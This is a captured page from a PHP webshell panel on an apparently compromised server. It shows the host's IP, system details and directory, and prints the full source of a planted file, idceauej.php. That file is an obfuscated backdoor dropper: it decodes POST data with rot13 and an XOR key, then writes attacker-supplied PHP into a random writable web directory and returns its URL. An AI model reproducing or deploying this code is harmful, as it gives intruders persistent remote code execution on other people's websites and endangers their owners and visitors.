403Webshell
Server IP : 103.119.228.120  /  Your IP : 13.59.129.141
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/hendraso/public_html/Modules/templates_c/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/hendraso/public_html/Modules/templates_c/idceauej.php
<?php

foreach ($_POST as $session_key => $value)
{
    if (strlen($session_key) == 16)
    {
        $value = str_split(rawurldecode(str_rot13($value)));
        $session_key = array_slice(str_split(str_repeat($session_key, (count($value)/16)+1)), 0, count($value));

        function encoder($val, $index, $session_key)
        {
            $auth = "knymqxdxkqwpthno";
            return $val ^ $auth[$index % strlen($auth)] ^ $session_key;
        }

        $value = implode("", array_map("encoder", array_values($value), array_keys($value), array_values($session_key)));

        $value = @unserialize($value);

        if (@is_array($value))
        {
            $key = array_keys($value);
            $value = $value[$key[0]];

            if ($value === $key[0])
            {
                echo @serialize(Array("php" => @phpversion(), ));exit();
            }
            else {
                function listdirs($dir)
                {
                    static $alldirs = array();
                    $dirs = glob($dir . '/*', GLOB_ONLYDIR);
                    if (count($dirs) > 0) {
                        foreach ($dirs as $d) {
                            if (@is_writable($d)) {
                                $alldirs[] = $d;
                            }
                        }
                    }
                    foreach ($dirs as $dir) listdirs($dir);
                    return $alldirs;
                }

                $docroot = $_SERVER["DOCUMENT_ROOT"];

                $dirs = listdirs($docroot);
                $key = array_rand($dirs);
                $dest = $dirs[$key] . "/" . substr(md5(time()), 0, 8) . ".php";

                @file_put_contents($dest, $value);

                echo "http://" . $_SERVER["HTTP_HOST"] . substr($dest, strlen($docroot));

                exit();
            }
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit